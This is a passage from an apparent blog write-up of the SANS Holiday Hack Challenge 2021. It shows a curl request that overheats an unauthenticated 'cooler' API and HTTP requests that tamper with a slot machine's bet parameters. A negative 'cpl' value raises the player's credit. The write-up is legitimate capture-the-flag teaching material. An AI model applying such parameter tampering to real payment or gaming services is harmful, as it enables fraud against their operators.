&lt;span class="go"&gt;├─────────────────────────────┼────────────────────────────────┤&lt;/span&gt;
&lt;span class="go"&gt;│ /api/toilet-seat-cooler     │ No                             │&lt;/span&gt;
&lt;span class="go"&gt;├─────────────────────────────┼────────────────────────────────┤&lt;/span&gt;
&lt;span class="go"&gt;│ /api/server-room-warmer     │ No                             │&lt;/span&gt;
&lt;span class="go"&gt;└─────────────────────────────┴────────────────────────────────┘&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Lucky us, we can interact with the &lt;code&gt;/api/cooler&lt;/code&gt; endpoint without
registering. We're also told that setting the temperature above 0 will melt
important furniture. Maybe like the entrance door? Let's try out:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@b7635de6f012:~$&lt;/span&gt; curl -XPOST -H &lt;span class="s1"&gt;&amp;#39;Content-Type: application/json&amp;#39;&lt;/span&gt; --data-binary &lt;span class="s1"&gt;&amp;#39;{&amp;quot;temperature&amp;quot;: 1337}&amp;#39;&lt;/span&gt; http://nidus-setup:8080/api/cooler
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;temperature&amp;quot;: 1337.89,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;humidity&amp;quot;: 45.81,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;wind&amp;quot;: 31.75,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;windchill&amp;quot;: 1747.3,&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;  &amp;quot;WARNING&amp;quot;: &amp;quot;ICE MELT DETECTED!&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Bingo, the ice around the door melted!&lt;/p&gt;
&lt;img alt="Grimy McTrollkins. Same image as before." class="align-center" src="/images/sans-christmas-challenge-2021/grimymctrollkins.png" /&gt;
&lt;p&gt;&lt;em&gt;Grimy McTrollkins says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
Great - now I can get back in!&lt;/blockquote&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-4"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id14"&gt;Objective 4:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="noel-boetie-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id15"&gt;Noel Boetie's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;This Cranberry Pi challenge is some kind of logic game. We move Chompy around
on a grid containing logic statements, and we must chomp the one that evaluate
to &lt;code&gt;True&lt;/code&gt;, while evading Trollog.&lt;/p&gt;
&lt;p&gt;There are several difficulty levels:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Beginner (Stage 0)&lt;/li&gt;
&lt;li&gt;Intermediate (Stage 3)&lt;/li&gt;
&lt;li&gt;Advanced (Stage 6)&lt;/li&gt;
&lt;li&gt;Expert (Stage 9)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There are also different kinds of logic statements&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Boolean Logic&lt;/li&gt;
&lt;li&gt;Arithmetic Expressions&lt;/li&gt;
&lt;li&gt;Number Conversions&lt;/li&gt;
&lt;li&gt;Bitwise Operations&lt;/li&gt;
&lt;li&gt;Potpourri (a mix of all of them)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The game tells us that we must complete a stage in Potpourri at Intermediate or
higher to win.&lt;/p&gt;
&lt;img alt="A game of Logic Munchers in Potpourri at Intermediate level. Chompy is represented by a green troll head. There's a Trollog, which is a pink triangle. There are different logic statements in our grid, such as 0=1, not True, 'b' = 'b', or 0b0001 &amp;gt;&amp;gt; 1 = 0b0001. We must chomp the ones that evaluate to True, for example 'b' = 'b'." class="align-center" src="/images/sans-christmas-challenge-2021/logic_munchers_game.png" /&gt;
&lt;p&gt;This is just a matter of quickly evaluating which statements are &lt;code&gt;True&lt;/code&gt;
or &lt;code&gt;False&lt;/code&gt;, there's no trick as far as I can tell. So just, you know,
move around with your arrow keys, chomping &lt;code&gt;True&lt;/code&gt; statements by pressing
the space bar, and evading Trollog and you'll be fine.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="slot-machine-investigation"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id16"&gt;Slot Machine Investigation&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We can now enter Frost Tower! Jack Frost is greeting us in the lobby:&lt;/p&gt;
&lt;img alt="Jack Frost, still wearing his red suit and smirking." class="align-center" src="/images/sans-christmas-challenge-2021/jack_smirk.png" /&gt;
&lt;p&gt;&lt;em&gt;Jack Frost says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Welcome to Frost Tower and Casino, the epicenter of the Frostiest Place on
Earth™!&lt;/p&gt;
&lt;p&gt;We’ll be running the Holiday Season from this point on, doing things far
better than those amateurs at Santa’s castle.&lt;/p&gt;
&lt;p&gt;Sadly, they just don’t understand the true meaning of the holidays.&lt;/p&gt;
&lt;p&gt;Feel free to explore, place some bets on certain slot machines, and visit
the gift store on your way out to shop to your heart's content. Money,
money, money!&lt;/p&gt;
&lt;p&gt;That's the true meaning of the holiday season.&lt;/p&gt;
&lt;p&gt;And don't forget: Tell all your friends to come to FrostFest and stay away
from that lame con next door!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Jack Frost seems to think that Christmas is all about money. But we all know
that Christmas is about learning and pwning! Let's take a look at his
&lt;a class="reference external" href="https://slots.jackfrosttower.com/"&gt;slot machines&lt;/a&gt;.&lt;/p&gt;
&lt;img alt="Jack Frost's slot machine. It's a five by three grid, with pictures of trolls, and bonus blocks with letters J or F. There are two bet controls: the bet size at 0.1 and the bet level at 1. In the lower right hand corner is the spin button. In the upper left hand corner is our total credit, which is 100." class="align-center" src="/images/sans-christmas-challenge-2021/slots.png" /&gt;
&lt;p&gt;Let's give this baby a spin and see the underlying HTTP requests:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/api/v1/02b05459-0d09-4881-8811-9a2a7e28fd45/spin&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;slots.jackfrosttower.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://slots.jackfrosttower.com/uploads/games/frostyslots-206983/index.html&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/x-www-form-urlencoded&lt;/span&gt;
&lt;span class="na"&gt;X-Ncash-Token&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;27d2b871-d3c4-42f1-86f0-008c7c74e6bf&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://slots.jackfrosttower.com&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;30&lt;/span&gt;

betamount=1&amp;amp;numline=20&amp;amp;cpl=0.1
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mon, 13 Dec 2021 13:43:11 GMT&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mon, 13 Dec 2021 13:43:11 GMT&lt;/span&gt;
&lt;span class="na"&gt;X-Powered-By&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;PHP/7.4.26&lt;/span&gt;
&lt;span class="na"&gt;Cache-Control&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;no-cache, private&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;X-Ratelimit-Limit&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;60&lt;/span&gt;
&lt;span class="na"&gt;X-Ratelimit-Remaining&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;59&lt;/span&gt;
&lt;span class="na"&gt;Access-Control-Allow-Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;*&lt;/span&gt;
&lt;span class="na"&gt;Via&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1.1 google&lt;/span&gt;
&lt;span class="na"&gt;Alt-Svc&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;clear&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;success&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;data&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;credit&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;98&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;jackpot&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;free_spin&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;free_num&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;scaler&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;num_line&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;bet_amount&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;pull&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;WinAmount&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;FreeSpin&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;WildFixedIcons&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:[],&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;HasJackpot&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;HasScatter&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;WildColumIcon&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;ScatterPrize&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;SlotIcons&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:[&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;scatter&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon6&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon2&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon7&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;wild&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;scatter&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon9&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon5&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon1&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon2&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon3&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;wild&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon7&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon8&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;icon8&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;ActiveIcons&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:[],&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;ActiveLines&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:[]},&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;response&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Keep playing!&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;message&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Spin success&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, the &lt;code&gt;betamount&lt;/code&gt; parameter seems to correspond to the bet level, and
&lt;code&gt;cpl&lt;/code&gt; seems to correspond to the bet size.&lt;/p&gt;
&lt;p&gt;I first try messing with the parameters by betting more than what was in my
credit bank, but it didn't work. So I thought that I'd try betting negative
amounts. I first try with the &lt;code&gt;betamount&lt;/code&gt; paramter, but it didn't work:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/api/v1/02b05459-0d09-4881-8811-9a2a7e28fd45/spin&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;slots.jackfrosttower.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://slots.jackfrosttower.com/uploads/games/frostyslots-206983/index.html&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/x-www-form-urlencoded&lt;/span&gt;
&lt;span class="na"&gt;X-Ncash-Token&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;27d2b871-d3c4-42f1-86f0-008c7c74e6bf&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://slots.jackfrosttower.com&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;31&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Dest&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;empty&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Mode&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;cors&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Site&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;same-origin&lt;/span&gt;
&lt;span class="na"&gt;Te&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trailers&lt;/span&gt;

&lt;span class="hll"&gt;betamount=-1&amp;amp;numline=20&amp;amp;cpl=0.1
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;404&lt;/span&gt; &lt;span class="ne"&gt;Not Found&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mon, 13 Dec 2021 13:44:00 GMT&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mon, 13 Dec 2021 13:44:00 GMT&lt;/span&gt;
&lt;span class="na"&gt;X-Powered-By&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;PHP/7.4.26&lt;/span&gt;
&lt;span class="na"&gt;Cache-Control&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;no-cache, private&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;X-Ratelimit-Limit&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;60&lt;/span&gt;
&lt;span class="na"&gt;X-Ratelimit-Remaining&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;59&lt;/span&gt;
&lt;span class="na"&gt;Access-Control-Allow-Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;*&lt;/span&gt;
&lt;span class="na"&gt;Via&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1.1 google&lt;/span&gt;
&lt;span class="na"&gt;Alt-Svc&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;clear&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;success&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;message&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;The betamount must be greater than or equal 0.&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So I then tried with the &lt;code&gt;cpl&lt;/code&gt; parameter:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/api/v1/02b05459-0d09-4881-8811-9a2a7e28fd45/spin&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;slots.jackfrosttower.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://slots.jackfrosttower.com/uploads/games/frostyslots-206983/index.html&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/x-www-form-urlencoded&lt;/span&gt;
&lt;span class="na"&gt;X-Ncash-Token&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;27d2b871-d3c4-42f1-86f0-008c7c74e6bf&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://slots.jackfrosttower.com&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;29&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Dest&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;empty&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Mode&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;cors&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Site&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;same-origin&lt;/span&gt;
&lt;span class="na"&gt;Te&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trailers&lt;/span&gt;

&lt;span class="hll"&gt;betamount=1&amp;amp;numline=20&amp;amp;cpl=-1
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mon, 13 Dec 2021 13:44:35 GMT&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mon, 13 Dec 2021 13:44:35 GMT&lt;/span&gt;
&lt;span class="na"&gt;X-Powered-By&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;PHP/7.4.26&lt;/span&gt;
&lt;span class="na"&gt;Cache-Control&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;no-cache, private&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;X-Ratelimit-Limit&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;60&lt;/span&gt;
&lt;span class="na"&gt;X-Ratelimit-Remaining&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;59&lt;/span&gt;
&lt;span class="na"&gt;Access-Control-Allow-Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;*&lt;/span&gt;
&lt;span class="na"&gt;Via&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1.1 google&lt;/span&gt;
&lt;span class="na"&gt;Alt-Svc&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;clear&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;success&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;data&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;credit&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;120&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;jackpot&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;free_spin&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;free_num&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;scaler&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span 